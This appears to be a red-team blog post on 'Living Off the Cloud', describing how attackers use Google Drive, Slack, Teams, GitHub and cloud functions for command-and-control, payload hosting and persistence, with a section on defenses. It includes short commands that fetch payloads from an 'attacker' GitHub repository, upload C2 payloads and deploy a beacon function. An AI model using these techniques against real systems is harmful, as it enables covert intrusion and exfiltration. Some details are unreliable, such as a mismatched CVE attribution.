# Living Off the Cloud: Abusing Cloud Services for Red Teaming

<figure><img src="https://cdn-images-1.medium.com/max/800/1*FckEUogcHe6AEPP_zFSp6A.jpeg" alt=""><figcaption></figcaption></figure>

***

#### Introduction: Blending into the Digital Skyline <a href="#f71f" id="f71f"></a>

Cyber threats today no longer rely on flashy malware or sketchy infrastructure. Modern adversaries especially Advanced Persistent Threats (APTs) are turning to **trusted cloud services** to operate invisibly. This technique is called **Living Off The Cloud (LOTC)**. and it’s rapidly becoming a staple of Red Team and nation-state toolkits.

Just like **Living Off the Land (LOTL)** involves using native OS tools, **LOTC uses cloud-based infrastructure you probably already trust.**

#### Why it Works <a href="#b207" id="b207"></a>

**Cloud services are:**

* Widely used and trusted: Firewalls and proxies often allow their traffic.
* Encrypted by default: Most use HTTPs, making inspection harder.
* Hard to blacklist: You can’t just block Google or Microsoft in most organizations.
* Globally available: Attackers don’t need infrastructure, just an account.

## Red Teaming Use Cases <a href="#id-16d0" id="id-16d0"></a>

### **Command and Control via Google Drive or Dropbox**

#### **TTP Flow:**

* Attacker drops payloads into shared cloud folder.
* Infected host polls folder every 30s via scheduled task or beacon.
* Exfiltrated data (e.g., screenshots, keystrokes) uploaded as new files.

#### **Tools:**

* `Silver` + Google Drive API
* `gdrive`: CLI for file uploads/downloads

```
gdrive upload C2_payload.exe
gdrive download --path /tmp tasking.json
```

**Why it works:** Google Drive traffic blends in with normal productivity behavior.

### **Slack or Microsoft Teams as C2 Channels**

TTP Flow:

* Slack bot posts commands in a private channel.
* Compromised endpoints polls the channel and executes.
* Output posted back as messages.

**Abuse Example:**

Slack webhook: [`https://hooks.slack.com/services/XXXX/YYYY/ZZZZ`](https://hooks.slack.com/services/XXXX/YYYY/ZZZZ)

**GitHub PoC:**

* `slack-shell`
* `TeamC2` abusing Microsoft Teams (CVE-2023–23397 related abuse scenario)

**Reference:**

APT29 allegedly used Microsoft Teams to deliver malware-laced documents via chat in a 2023 attack

> **Bonus:** Many orgs run Slack in-browser or as a native app again, trusted traffic.

### **Payload Hosting via GitHub Repositories**

GitHub repositories (public or private) can host:

* Encrypted payloads or scripts
* Infrastructure-as-code (IaC) templates for dynamic infrastructure.
* Configuration files used by implants
* HTTPS and CDN delivery

Tool Example:

* `gitC2`: C2 over GitHub repos.

```
git clone https://github.com/attacker/payloads.git

gpg --decrypt payload.bin.gpg
```

### **Persistence via Cloud Functions**

Cloud functions allow **event-driven execution** in the cloud. Perfect for stealthy persistence.

**Platforms:**

* **AWS Lambda**
* **Google Cloud Functions**
* **Azure Functions**

Red Team Use:

* Trigger C2 beacon on HTTP request
* Inject shellcode into warm function containers
* Auto-deploy second-stage payloads

```
gcloud functions deploy beacon --runtime python39 --trigger-http
```

## Blue Teams: Defending Against LOTC <a href="#f0fd" id="f0fd"></a>

Defending against LOTC is challenging, but not impossible. Here’s what Blue Teams and defenders should be doing:

### **Monitor for Anomalous Cloud Services**

* **OAuth token abuse:** Unknown apps with high permissions
* **Personal cloud storage:** Used from corporate devices
* **API usage spikes:** Especially to Slack, GitHub, Dropbox

### **Inspect DNS and HTTPs Metadata**

Even if payloads are encrypted, patterns like:

* Repeated traffic to non-standard subdomains
* Odd timing patterns (e.g., beaconing every 30s)
* Known cloud URLs used in unusual ways

### **Logs Everything You Can**

* Enable audit logs on cloud platforms (e.g., Google Workspace, M365)
* Monitor file sharing activity and access patterns.
* Look for out-of-place automation, like rogue bots, unknown Lambda functions, GitHub webhook abuses.

### **Analyze DNS + HTTPS Metadata**

Even if payloads are encrypted, behaviours reveal intent:

<figure><img src="https://cdn-images-1.medium.com/max/800/1*gYYC-2UwLieer9TF3HXUhA.png" alt=""><figcaption></figcaption></figure>

## CVEs, Zero-days, and weaknesses Enabling LOTC <a href="#id-756c" id="id-756c"></a>

<figure><img src="https://cdn-images-1.medium.com/max/800/1*rYUkuu8g_apgPuaOGftn-Q.png" alt=""><figcaption></figcaption></figure>

## Future of LOTC: AI-Enhaned Attacks? <a href="#d397" id="d397"></a>

with the rise of **GenAI and Cloud**, imagine:

* GPT-generated phishing via Microsoft 365
* Dynamic payload generation hosted on GitHub Actions
* AI-controlled implants communicating via AI API (e.g., OpenAI, Anthropic)

## Try it Yourself <a href="#id-26ef" id="id-26ef"></a>

Simulated Red Team scenario using cloud-based C2

Check out:

* **Mythic C2 Framework:**

{% embed url="<https://github.com/its-a-feature/Mythic>" %}

* **Silver C2:**

{% embed url="<https://github.com/BishopFox/sliver>" %}

* **Red Canary’s Atomic Red Team Cloud TTPs:**

{% embed url="<https://github.com/redcanaryco/atomic-red-team>" %}